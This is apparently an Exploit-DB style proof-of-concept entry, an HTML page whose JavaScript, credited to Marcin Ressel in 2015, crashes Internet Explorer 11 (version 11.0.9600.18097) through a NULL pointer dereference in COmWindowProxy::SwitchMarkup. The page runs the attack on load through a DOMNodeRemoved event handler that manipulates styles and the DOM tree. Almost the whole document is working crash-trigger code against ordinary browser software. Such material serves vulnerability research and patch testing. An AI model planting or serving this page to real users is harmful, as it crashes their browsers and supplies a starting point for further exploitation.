Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR
<!doctype html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>IE11 11.0.9600.18097 NULL PTR</title>
<script>
/*
* Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR
* Date: 09.12.2015
* Exploit Author: Marcin Ressel
* Vendor Homepage: www.microsoft.com
* Software Link: 0
* Version: 11.0.9600.18097
* Tested on: Windows 7 x64
* https://twitter.com/m_ressel
*/
var trg,src,arg;
function tk() {
targetDomTree = document.getElementsByTagName("*");
var meta = document.createElement('meta');
meta.setAttribute("http-equiv", "X-UA-Compatible");
meta.setAttribute("content",'IE=10');
document.getElementsByTagName("head")[0].appendChild(meta);
doc = document;
src = targetDomTree[8];
trg = targetDomTree[1];
arg = targetDomTree[0];
arg.addEventListener("DOMNodeRemoved",new Function("",
'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+
'try{trg = arg.removeNode(true);}catch(err){}'+
'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+
'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+
'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+
'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+
'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+
'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}'
),
true);
trg.outerText = new Object();
trg.parentNode.appendChild(document.createElement("div"));
}
</script>
</head>
<body onload='tk();'>
<div id="out">..</div>
<div id="oneUnArg">...</div>
<div id="pHolder"></div>
</body>
</html>